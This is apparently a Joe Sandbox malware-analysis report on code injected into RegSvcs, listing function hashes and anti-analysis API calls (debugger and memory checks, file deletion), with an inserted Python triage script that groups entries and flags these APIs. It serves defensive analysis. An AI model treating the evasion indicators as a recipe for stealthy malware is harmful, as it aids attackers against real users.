                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 8ec19b37388f6f6d59e14ee54fd8359d50c5b9949ce4bd8b0a62205cde0e763f
                                                                        • Instruction ID: cc2e7c6aa0db1692f01b224c4518745ac0d9a21339033eb9f446826234ee80b6
                                                                        • Opcode Fuzzy Hash: 8ec19b37388f6f6d59e14ee54fd8359d50c5b9949ce4bd8b0a62205cde0e763f
                                                                        • Instruction Fuzzy Hash: E12113B2C0065ACFDB14CF9AC9447EEFBB4EF48720F14856AD958A7240D338A945CFA5

Control-flow Graph (rendered graph omitted): entry block 1678b48-1678b92; DeleteFileW called in block 1678b9a-1678bc5; exit block 1678bce-1678bf6
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 01678BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 48496a18a3a58028d0969a6ca0b31f13f70d0ba80c489cd2a26268552edc827e
                                                                        • Instruction ID: fc56e1de481ce6abbe10d34ee96391863522be90504c6043de0a6e11b5de17c8
                                                                        • Opcode Fuzzy Hash: 48496a18a3a58028d0969a6ca0b31f13f70d0ba80c489cd2a26268552edc827e
                                                                        • Instruction Fuzzy Hash: 3B1136B1C0061ADFDB14CF9AC844BAEFBB4EF48720F14812AD918A7340D338A940CFA5

Control-flow Graph (rendered graph omitted): entry block 167f7d8-167f84c, which calls GlobalMemoryStatusEx; exit block 167f855-167f87d
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0167F83F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: d4fd57280b419df38155fcb3cd4beeefa1a120d1f3b58791222e6a5a42fa29da
                                                                        • Instruction ID: f8fcc0c74a3ac1053c4b86155e2b9233dc8d9be626ae54ad8b34f1800a1b1b83
                                                                        • Opcode Fuzzy Hash: d4fd57280b419df38155fcb3cd4beeefa1a120d1f3b58791222e6a5a42fa29da
                                                                        • Instruction Fuzzy Hash: 971112B1C0066A9FDB10CF9AC844BDEFBF4AF48720F15816AD918A7240D378A940CFA5
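The six KERNEL32-referencing entries above come in pairs: each pair shares one API reference address (0167F83F, 0167804F, 01678BB8) but carries different Opcode and Instruction IDs, because the IDA plugin recovered the same function from two start offsets. When triaging a report like this, group by call site rather than by Opcode ID. The Python below is an added example, not part of the Joe Sandbox report: it parses entries in this block format, collapses entries that reach the same (API, ref) call site, flags the anti-analysis APIs, and lists dump regions the report marks as not backed by a PE. The SAMPLE text is constructed from the values shown above, and the ANTI_ANALYSIS set is this example's own heuristic, not a report field.

```python
"""Parse Joe Sandbox per-function metadata blocks and collapse entries that
refer to the same imported API call site.

Added example, not part of the Joe Sandbox report. SAMPLE is constructed from
the six KERNEL32-calling entries of this report; ANTI_ANALYSIS is a heuristic
chosen for this example (assumption), not a field the report provides."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 0167F83F
Memory Dump Source
• Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
Similarity
• API ID: GlobalMemoryStatus
• Opcode ID: 7cff1e69e3f66361a021abf5253a35f18f1e22c89fefbc3fd0e4ea9db659c41a
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
• Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
• Opcode ID: 19fff29062ebbab62677397c6544efa8b171fcdca783332a2f5345f64604447f
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
• Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
• Opcode ID: 5ef63de9b506027b27e060c7f643da427e8c8f34d51ac12da453d7e0a42c1c65
APIs
• DeleteFileW.KERNEL32(00000000), ref: 01678BB8
• Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
• Opcode ID: 8ec19b37388f6f6d59e14ee54fd8359d50c5b9949ce4bd8b0a62205cde0e763f
APIs
• DeleteFileW.KERNEL32(00000000), ref: 01678BB8
• Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
• Opcode ID: 48496a18a3a58028d0969a6ca0b31f13f70d0ba80c489cd2a26268552edc827e
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 0167F83F
• Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
• Opcode ID: d4fd57280b419df38155fcb3cd4beeefa1a120d1f3b58791222e6a5a42fa29da
"""

# "Name.MODULE(args), ref: ADDR" with optional argument list and comma.
API_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
OPCODE_RE = re.compile(r"^Opcode ID:\s*(?P<id>[0-9a-f]{64})$")

# Heuristic (assumption): APIs commonly used to spot a debugger or a
# low-RAM sandbox before a stealer unpacks its payload.
ANTI_ANALYSIS = {"CheckRemoteDebuggerPresent", "IsDebuggerPresent", "GlobalMemoryStatusEx"}


def parse_entries(text):
    """Return one dict per function entry; an entry ends at its Opcode ID line."""
    records, cur = [], {"apis": [], "offset": None, "pe_backed": None}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := API_RE.match(line):
            cur["apis"].append((m["name"], m["module"], m["ref"].upper()))
        elif m := SOURCE_RE.search(line):
            cur["offset"], cur["pe_backed"] = m["offset"].upper(), m["pe"] == "true"
        elif m := OPCODE_RE.match(line):
            cur["opcode_id"] = m["id"]
            records.append(cur)
            cur = {"apis": [], "offset": None, "pe_backed": None}
    return records


def group_by_callsite(records):
    """Map (API name, ref address) -> Opcode IDs of every entry reaching it.
    Entries with different Opcode IDs but the same ref are one function
    recovered from two start offsets, not two distinct functions."""
    groups = defaultdict(list)
    for rec in records:
        for name, _module, ref in rec["apis"]:
            groups[(name, ref)].append(rec["opcode_id"])
    return dict(groups)


def anti_analysis_apis(records):
    """Names of anti-debug / anti-sandbox APIs referenced by any entry."""
    return {name for rec in records for name, _m, _r in rec["apis"] if name in ANTI_ANALYSIS}


def unbacked_regions(records):
    """Dump offsets whose memory is not backed by a PE on disk (injected code)."""
    return {rec["offset"] for rec in records if rec["pe_backed"] is False}


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for (name, ref), ids in sorted(group_by_callsite(recs).items()):
        print(f"{name:<28} ref {ref}: {len(ids)} entries, {len(set(ids))} distinct Opcode IDs")
    print("anti-analysis APIs:", sorted(anti_analysis_apis(recs)))
    print("unbacked regions:", sorted(unbacked_regions(recs)))
```

Run directly, the script reduces the six entries to three call sites (one CheckRemoteDebuggerPresent, one GlobalMemoryStatusEx, one DeleteFileW), all inside the 01670000 region of RegSvcs that the dump marks as not PE-backed. Extend SAMPLE with the remaining entries of the report to apply the same grouping to the whole function list.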

Control-flow Graph (rendered graph omitted): entry block 6e5fe80-6e5feae; the call at 6e5feb1 is resolved to either 167f260 or 167f268 in the 01670000 region; exit block 6e5ff3b-6e5ff42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810
                                                                        • Opcode ID: 478f0d367a7e107dcf998d5b11b7e50950abd298542e0d7d7307a47c47c917fd
                                                                        • Instruction ID: 26898e07b06044c1bbb30eaa1f5e3cf2efc1975ad03003e8ca14cd9b8ebc79b7
                                                                        • Opcode Fuzzy Hash: 478f0d367a7e107dcf998d5b11b7e50950abd298542e0d7d7307a47c47c917fd
                                                                        • Instruction Fuzzy Hash: F5117F71B10224CFDB409B788808B6E7BF6AF8C600F114469E91AE73A0EB35AD41CF90

Control-flow Graph (rendered graph omitted): entry block 6e5fe90-6e5feae; the call at 6e5feb1 is resolved to either 167f260 or 167f268 in the 01670000 region; exit block 6e5ff3b-6e5ff42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810
                                                                        • Opcode ID: 4b2e48c30138296cd24f50e5f212a8f1fc1a5fe4dfc96e2ed1d358c9432311e4
                                                                        • Instruction ID: 7f11826c0d420495d3f6e9e421a2248ccce895e6350445533270e5c7307fd46a
                                                                        • Opcode Fuzzy Hash: 4b2e48c30138296cd24f50e5f212a8f1fc1a5fe4dfc96e2ed1d358c9432311e4
                                                                        • Instruction Fuzzy Hash: 7F115E74B10214DFDB549B78C808B6E7BF5AF4C710F104469EA0AD7390EB35AD01CB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27011956fdcb3d90702b468833a1175d5a3f2f43b7410b72d6f83e3036a67453
                                                                        • Instruction ID: 769ec7b95b7fc8c59dfc9477d4ea3a8da11fca6cdb9bf3456c6b88d23dbb4639
                                                                        • Opcode Fuzzy Hash: 27011956fdcb3d90702b468833a1175d5a3f2f43b7410b72d6f83e3036a67453
                                                                        • Instruction Fuzzy Hash: 68925530A00305CFDB64DB68C588A5DB7F2FB44318F5694AAE949AB361DB35ED85CF80

Control-flow Graph (large rendered graph omitted): entry block 6e5cef8-6e5cf13; repeated calls to 6e56138 and one call to 6e5da6d; a self-looping block at 6e5da58; common exit through 6e5d915-6e5d94e
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad7cb1ab6717c6d8296013b22c6aabc34a49c41d3f1048166e0e8f1d4d2f4e49
                                                                        • Instruction ID: 2d089abe8bb2cc1f5a9465e69ccba11904df3e1f307bf30d0fdbc8d746810d1c
                                                                        • Opcode Fuzzy Hash: ad7cb1ab6717c6d8296013b22c6aabc34a49c41d3f1048166e0e8f1d4d2f4e49
                                                                        • Instruction Fuzzy Hash: 10627930A0020ACFDB55EB68D890B5EB7B2FF88314F219A68D5059F354DB75ED86CB84
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8756c8aa38e0e04ca6400736354861907dadfc168013f043cdfd57a83e89f295
                                                                        • Instruction ID: b518eab80ef80b87a1728e3cd4e86ec798f60adee929ab7cf9227dc0680a6c1e
                                                                        • Opcode Fuzzy Hash: 8756c8aa38e0e04ca6400736354861907dadfc168013f043cdfd57a83e89f295
                                                                        • Instruction Fuzzy Hash: 75028B30E1030A8FDBA4CF68C4A07ADB7B2EB85304F21992AD815DB355DB74EC85CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f5f6ef88891890eb872d2f22f9c6db72b8c52af66f6907d45580f341c3b732c
                                                                        • Instruction ID: e48ec51180d090693e5ba0a70973d562156d79f56ac8738968b45f7a038bd909
                                                                        • Opcode Fuzzy Hash: 3f5f6ef88891890eb872d2f22f9c6db72b8c52af66f6907d45580f341c3b732c
                                                                        • Instruction Fuzzy Hash: 5FE15D30E1030A8FDB65DF68D9946AEB7B2EF89304F219629D806DB351DB35DC46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d866caa7cc6dabea4513886ecab045192286f0d159b2587a4f8cff45dc28b48
                                                                        • Instruction ID: 1109c8f7bc2dff09f541d038052cb9d4ccbd958ced35c27e696f4ec0e97f6f3c
                                                                        • Opcode Fuzzy Hash: 8d866caa7cc6dabea4513886ecab045192286f0d159b2587a4f8cff45dc28b48
                                                                        • Instruction Fuzzy Hash: CDC16D34A002098FDF54DBA8D584AADBBB2FF88314F659429EC06DB365DB34ED42CB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97adb517fd3a4623fd13b3c40872b06691de1bf66b112cbe89e1fe7c939a81ae
                                                                        • Instruction ID: 8566e7a9c7022eaec396b99adb4edff67477511ab975c19d26f4129c09a642c9
                                                                        • Opcode Fuzzy Hash: 97adb517fd3a4623fd13b3c40872b06691de1bf66b112cbe89e1fe7c939a81ae
                                                                        • Instruction Fuzzy Hash: 77A14B30B013568FEB54DF78C85076EB7B2FF88200F1045A9D90AAB395EA35DD86CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Opcode ID: b363fbcb1934ac0c752034db74f204bffb80e8ae2ec98e2cbc8d5ec2f1dbe7f9
                                                                        • Instruction ID: 9abc7b9ca82f5da1e112c7ad43423bc9ea7cc234b560dc667a3f111ba7b5e149
                                                                        • Opcode Fuzzy Hash: b363fbcb1934ac0c752034db74f204bffb80e8ae2ec98e2cbc8d5ec2f1dbe7f9
                                                                        • Instruction Fuzzy Hash: 122101B2604304DFDF45DF54D9C1B26BBA6FB84318F20C66DE90A4B296C33AD846CA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfd66234bb9ecfbc2a0bb3e5c5582ab964224334ef00616e515c5cc71caebc5f
                                                                        • Instruction ID: a479c8262ba1fe7e93c88d31341d4d21f4c00505141c8dc5303aef3cc1e3a2b0
                                                                        • Opcode Fuzzy Hash: cfd66234bb9ecfbc2a0bb3e5c5582ab964224334ef00616e515c5cc71caebc5f
                                                                        • Instruction Fuzzy Hash: 75116136B101694FDF94AA79D818AEE77EAEBC8250F01457AD806EB344EE25DC018B91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 466b15feb5b86517dc4286c3f653c8418c82135bc30578584c13409517cb6acb
                                                                        • Instruction ID: bf85cbffe95475578ab9c6cdde0aa63e95ba3ed2d18f721ee1004f8c094f24a4
                                                                        • Opcode Fuzzy Hash: 466b15feb5b86517dc4286c3f653c8418c82135bc30578584c13409517cb6acb
                                                                        • Instruction Fuzzy Hash: 3F017B35B002550BCB61967CD41436FB7EADFCA718F108439EA0AC7381EE21DC034B84
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a48cd06ec03a131f55abe364dea78b4bf65e3c194877cc1c52e27e37998e694b
                                                                        • Instruction ID: 2ac2bc23ab8b11d8c82f73b841569e349090585fef1900bd415fbe297acfb599
                                                                        • Opcode Fuzzy Hash: a48cd06ec03a131f55abe364dea78b4bf65e3c194877cc1c52e27e37998e694b
                                                                        • Instruction Fuzzy Hash: 3411C830B102698BDFA4DB68D8507AE77A6EB81354F0044BAD909D73C1EB31DD418B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa070f159da5a9815edfdd88bc86dcb70bbae6c399297581ee87177aa4d40a51
                                                                        • Instruction ID: 9e8587c65e838843eb3bbc94759d7a5810d1fe5eb5daf750f8caebee0a01f5e1
                                                                        • Opcode Fuzzy Hash: fa070f159da5a9815edfdd88bc86dcb70bbae6c399297581ee87177aa4d40a51
                                                                        • Instruction Fuzzy Hash: 9101DF31F101114BDFA5D67C989576EA3DADBC9314F11983AE90ACB380EE25DD038BD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2563647216.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_139d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                        • Instruction ID: 92950aa416fcc1ccc5ee42fd8e2599eb4ce58bd6d185e0990b512c73bc8f8553
                                                                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                                        • Instruction Fuzzy Hash: 0411BB76504284CFCB12CF58D9C4B15BFA1FB84318F28C6AAD8494B757C33AD44ACB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a19f9db3fdd71ad48a57a84642a40daa50ada3155eccbd0cae8d69d3163c71f4
                                                                        • Instruction ID: 2221bbb4e935b9b6967b2d9246aa2de7e689b585aa93492aae467cff408a1c36
                                                                        • Opcode Fuzzy Hash: a19f9db3fdd71ad48a57a84642a40daa50ada3155eccbd0cae8d69d3163c71f4
                                                                        • Instruction Fuzzy Hash: 7B21FFB5C002199FDB00CF9AD984BDEFBB4FB48314F10812AE918A7240D378A954CFA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ece294084efb5de3ad71e5cb8deccf6c5ffe0b97b575c3320023fe4fa2975a8f
                                                                        • Instruction ID: d921f5029b52e85765b2648a151e5231f744a9205bf57d4955bf15c759456296
                                                                        • Opcode Fuzzy Hash: ece294084efb5de3ad71e5cb8deccf6c5ffe0b97b575c3320023fe4fa2975a8f
                                                                        • Instruction Fuzzy Hash: A911B0B5D01259AFDB00CF9AD884ADEFBB4FB48724F10812AE918A7340D374A954CFA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2563647216.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_139d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 571ae3314b5eab4f3956dd8972c21c0340599e146b22899774add593c253268d
                                                                        • Instruction ID: eac73f1f10fb138cd40a22246e8afdeaeaacbe846dcfda0bb7a8d019e4dd6f4b
                                                                        • Opcode Fuzzy Hash: 571ae3314b5eab4f3956dd8972c21c0340599e146b22899774add593c253268d
                                                                        • Instruction Fuzzy Hash: A811BFB6504284CFDB06CF54D9C4B15BFB2FB84318F24C6ADD8494B656C33AD44ACB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abaa82f2ecfa2905c785a7261bc89e3add81f7ca3f748fcc5138e1c1c198c8c4
                                                                        • Instruction ID: 8ccb0fbb0765532de26cff4364e5c39b0805c8a9e434028435a868e16d5aeaac
                                                                        • Opcode Fuzzy Hash: abaa82f2ecfa2905c785a7261bc89e3add81f7ca3f748fcc5138e1c1c198c8c4
                                                                        • Instruction Fuzzy Hash: 84018436B101594BDB94E9A9DC14AEE77EEDBC8650F01403AD90AE7244FE24DD058791
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41920204746060f9d7bc70f94b44cfc6b61fc28260263c4e1fce941b032beb2f
                                                                        • Instruction ID: d7f7bd6b73d4d635dab255dc8b964b460fc27d5be380670f08a0d7ae1bb95df8
                                                                        • Opcode Fuzzy Hash: 41920204746060f9d7bc70f94b44cfc6b61fc28260263c4e1fce941b032beb2f
                                                                        • Instruction Fuzzy Hash: DA01F435B102150BDBA0966DD45472FB3DAEBCA754F208439EA0BC7380FE65EC030795
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44058421a78d51048fad1ad2d18ef50dbc96f6ee95e8cdd11117c1c7562a525d
                                                                        • Instruction ID: 98542dd8acb6a6833d6fc02ae789cf78b35bf8cc52ddfae4dedbc00e56f0946f
                                                                        • Opcode Fuzzy Hash: 44058421a78d51048fad1ad2d18ef50dbc96f6ee95e8cdd11117c1c7562a525d
                                                                        • Instruction Fuzzy Hash: 9101FC347102054FE760DA7CE85571E7BE5DB89718F10547DEA0ACB351EE15EC028784
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0237f85f3fdbff4d5e15a8955523c2d52e727d15b84157315b198e71b27ff9e4
                                                                        • Instruction ID: a23980419dd7ec83506bde967535658d7fe4e2603190d6daf3f1ea2e4d8dbb2f
                                                                        • Opcode Fuzzy Hash: 0237f85f3fdbff4d5e15a8955523c2d52e727d15b84157315b198e71b27ff9e4
                                                                        • Instruction Fuzzy Hash: 0E01A431B101150BDBA5967C985472EB7DAD7C9724F109839ED0ACB380EE25DD434B95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2dd9bd091702b2a69e3ac63017b5992a889150107ef65b65c7b7449207dc13f
                                                                        • Instruction ID: 491a2482a4f2e24a539a734c751c879470b92ba470e11c11d2228e11863932b2
                                                                        • Opcode Fuzzy Hash: f2dd9bd091702b2a69e3ac63017b5992a889150107ef65b65c7b7449207dc13f
                                                                        • Instruction Fuzzy Hash: 1301A434B102154FEBA4DA6CE85572E77DAEB89718F10953CEA0ACB350EE25EC028784
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4fb0d7750ffa505212ea20670126e317e53ade7c7ea38b037b649c3af61d667a
                                                                        • Instruction ID: 81ac5d973143767d1cd1dd68e6b9088e6e7a791298861b43b85d582eae47f683
                                                                        • Opcode Fuzzy Hash: 4fb0d7750ffa505212ea20670126e317e53ade7c7ea38b037b649c3af61d667a
                                                                        • Instruction Fuzzy Hash: D601F971F103249BCB549A69EC5069D7779F789714F10543DEA01E7380DB35AC058BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6cbe7918218a86d81c45dd0fd08f24abd0509197fffedeb95feb348e6a3e1d10
                                                                        • Instruction ID: c0a16da0e87fa777ceef977e538dbb6feb53455f420520ff6a98b58e28d64bbf
                                                                        • Opcode Fuzzy Hash: 6cbe7918218a86d81c45dd0fd08f24abd0509197fffedeb95feb348e6a3e1d10
                                                                        • Instruction Fuzzy Hash: 1FF0A435A00305DFEFA4CA48E9402F97765EB40314F16646EDE09C7241EF35DD25CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
